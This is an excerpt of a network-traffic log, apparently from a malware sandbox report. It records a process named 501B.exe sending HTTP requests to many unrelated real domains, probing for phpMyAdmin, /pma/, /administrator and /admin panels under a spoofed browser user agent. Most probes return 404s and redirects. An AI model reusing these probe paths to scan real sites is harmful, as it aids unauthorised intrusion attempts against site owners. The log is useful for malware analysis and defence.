                                                                                                                                                                                                                                                                                                                176192.168.2.65791469.160.38.280
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.134929895 CET217OUTGET /pma/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: 3marc.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.293169975 CET514INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:32 GMT
                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                Content-Length: 315
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                177192.168.2.65799366.115.173.18880
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.243078947 CET252OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: conceptualintegration.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                178192.168.2.657938195.68.234.25280
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.243333101 CET227OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: pfprojekt.sk
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.456499100 CET497INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:32 GMT
                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                Location: http://www.pfprojekt.sk/phpMyAdmin/
                                                                                                                                                                                                                                                                                                                Content-Length: 243
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 70 66 70 72 6f 6a 65 6b 74 2e 73 6b 2f 70 68 70 4d 79 41 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.pfprojekt.sk/phpMyAdmin/">here</a>.</p></body></html>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                179192.168.2.65799281.31.35.5080
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.315057039 CET226OUTGET /pma/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: evropskypravnik.cz
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.509670973 CET425INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:32 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                Content-Length: 196
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                180192.168.2.657991195.68.234.25280
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.336554050 CET221OUTGET /admin HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: pfprojekt.sk
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.554629087 CET485INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:32 GMT
                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                Location: http://www.pfprojekt.sk/admin
                                                                                                                                                                                                                                                                                                                Content-Length: 237
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 70 66 70 72 6f 6a 65 6b 74 2e 73 6b 2f 61 64 6d 69 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.pfprojekt.sk/admin">here</a>.</p></body></html>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                181192.168.2.6583173.64.163.5080
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:33.495059013 CET221OUTGET /pma/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: la-morada.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:33.684106112 CET346INHTTP/1.1 410 Gone
                                                                                                                                                                                                                                                                                                                Server: openresty
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:33 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 34 39 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 30 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 6c 61 2d 6d 6f 72 61 64 61 2e 63 6f 6d 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: 7<html>9 <head>49 <meta http-equiv='refresh' content='0; url=http://la-morada.com/' />a </head>8</html>0


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                182192.168.2.65843281.31.35.5080
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:34.087624073 CET227OUTGET /admin HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: evropskypravnik.cz
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:34.281595945 CET425INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:34 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                Content-Length: 196
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                183192.168.2.658436188.120.236.1880
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:34.088303089 CET224OUTGET /admin.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: eremina.net
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:34.308948040 CET1340INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/8.5
                                                                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                Date: Fri, 01 Dec 2023 22:09:33 GMT
                                                                                                                                                                                                                                                                                                                Content-Length: 1245
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:34.308954954 CET173INData Raw: 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 68 33 3e 0d 0a 20 3c 2f 66 69 65 6c 64 73
                                                                                                                                                                                                                                                                                                                Data Ascii: been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                184192.168.2.64977615.197.142.173803492C:\Users\user\AppData\Local\Temp\501B.exe
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.505153894 CET224OUTGET /admin HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: malibusands.net
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.608155012 CET419INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:37 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                Content-Length: 125
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Server: ip-10-123-122-137.ec2.internal
                                                                                                                                                                                                                                                                                                                X-Request-Id: 204abcb7-24fa-4ee4-8427-c1f2dca1d728
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title>** Not Found **</title></head><body>HTTP Status: 404 (not found)</body></html>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                185192.168.2.64973166.96.160.144803492C:\Users\user\AppData\Local\Temp\501B.exe
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.509468079 CET234OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: jumpnsplashwear.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.621788025 CET1188INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:37 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                Content-Length: 867
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Server: Apache/2
                                                                                                                                                                                                                                                                                                                Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT
                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                Expires: Sat, 02 Dec 2023 01:09:41 GMT
                                                                                                                                                                                                                                                                                                                Age: 6
